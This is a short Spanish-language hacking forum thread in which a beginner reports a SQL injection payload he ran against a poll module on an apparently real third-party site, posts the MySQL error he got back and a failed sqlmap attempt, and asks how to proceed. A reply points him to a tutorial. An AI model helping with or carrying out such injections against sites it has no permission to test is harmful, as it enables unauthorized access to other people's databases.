Título: iniciando en el mundo de SQLi [ayuda] Publicado por: dArKo2 en 29 Julio 2011, 01:32 am Encontre una pagina que tiene una vulnerabilidad SQL:
el servidor es un MySQL tengo los detalles del servidor y toda la cosa estos son los parametros que inyecto: ----> '4+and+1=0+union+select+1+from+votos+--+ a esta linea ----> modules.php?name=Surveys&op=results&pollID= cuando lo hago obtengo el resultado siguiente: Encuesta Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible) estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es: [18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' or 'access://DATABASE_FILEPATH' Título: Re: iniciando en el mundo de SQLi [ayuda] Publicado por: ruben_linux en 25 Agosto 2011, 01:35 am tal vez te puede ayudar esto
http://foro.elhacker.net/bugs_y_exploits/mi_primer_sqli_tutorial_de_una_experiencia-t337064.0.html (http://foro.elhacker.net/bugs_y_exploits/mi_primer_sqli_tutorial_de_una_experiencia-t337064.0.html) Si quieres mandame un mp. |